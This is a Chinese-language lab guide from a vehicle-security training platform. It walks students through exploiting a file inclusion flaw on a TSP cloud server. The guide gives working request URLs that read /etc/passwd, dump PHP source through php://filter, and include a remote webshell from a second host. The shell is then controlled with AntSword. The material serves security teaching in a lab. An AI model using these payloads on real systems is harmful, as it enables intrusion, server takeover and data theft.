智能網聯汽車信息安全實訓平臺的文件包含漏洞實驗,測試方案覆蓋車機軟件、車載通信、車內智能終端設備、車內總線等檢測環境。
通過指導學生上機實踐,讓學生學習利用TSP云平臺的文件包含漏洞進行攻擊的基本原理和操作過程,了解除汽車本身外,TSP平臺可能存在的安全威脅,并加強安全防護意識。
本實驗介紹一種對TSP云平臺進行文件包含漏洞利用的基本過程。利用本地文件包含查看服務器端的隱私文件,利用遠程文件包含向服務器上傳木馬,并使用中國蟻劍連接木馬,從而實現對服務器的遠程控制。
依賴軟件工具:中國蟻劍
一個網站管理工具,也常用于授權人員對網站的安全滲透測試。本實驗使用這個工具連接在遠程文件包含中植入的網站木馬。
依賴硬件工具
Windows系統PC,Ubuntu系統工控機。
實驗步驟
實驗流程和網絡拓撲
1.搜索到TSP云平臺的文件包含漏洞
打開TSP云平臺登錄頁面,觀察到URL的參數filename的值是一個login.php,是一個頁面,因此推測該平臺存在文件包含漏洞。
http://192.168.9.135/include.php?filename=login.php
代碼使用了文件包含函數
使用以下命令測試,可以確定漏洞確實存在。
http://192.168.9.135/include.php?filename=/etc/passwd
驗證存在文件包含漏洞
2.使用本地文件包含來讀取本地文件隱私數據
本實驗在test目錄內放了兩個key.php文件。使用以下命令讀取key1.php,可以得到解析后的內容。
http://192.168.9.135/include.php?filename=test/key1.php
可以直接讀取服務器端的文件內容
使用同樣的方法讀取key2.php,發現不能直接讀取到key信息。
http://192.168.9.135/include.php?filename=test/key2.php
無法看到完整的源代碼
為了獲取到源代碼的內容,可以利用php偽協議,讀取key2.php經過base64加密后的數據。 http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php
顯示編碼后的php文件源代碼
將base64密文解碼,就可以得到源碼中隱藏的key。
看到解碼后的源碼內容
3.使用遠程文件包含來植入木馬
除了讀取服務器端的本地文件,還可以利用遠程文件包含向服務器上傳木馬,從而控制服務器。本實驗已經在本地部署了一個apache服務器,并定義了木馬生成文件 “shell.txt”。
上傳木馬
訪問以下網址來上傳木馬: http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt
植入木馬
4.通過菜刀或中國蟻劍來連接木馬,遠程控制服務器
打開中國蟻劍,點擊右鍵,選擇 “添加數據”,在 “URL地址” 中輸入上一步上傳木馬使用的URL,連接密碼為 “shell”。點擊 “測試連接”,顯示連接成功后,點擊左上角 “添加” 來確認添加此連接。
使用中國蟻劍連接木馬
雙擊該連接,可以看到網站后臺的所有文件,并且可以進行新建目錄、上傳文件等操作。
實現對服務器的遠程控制
fqj
評論
查看更多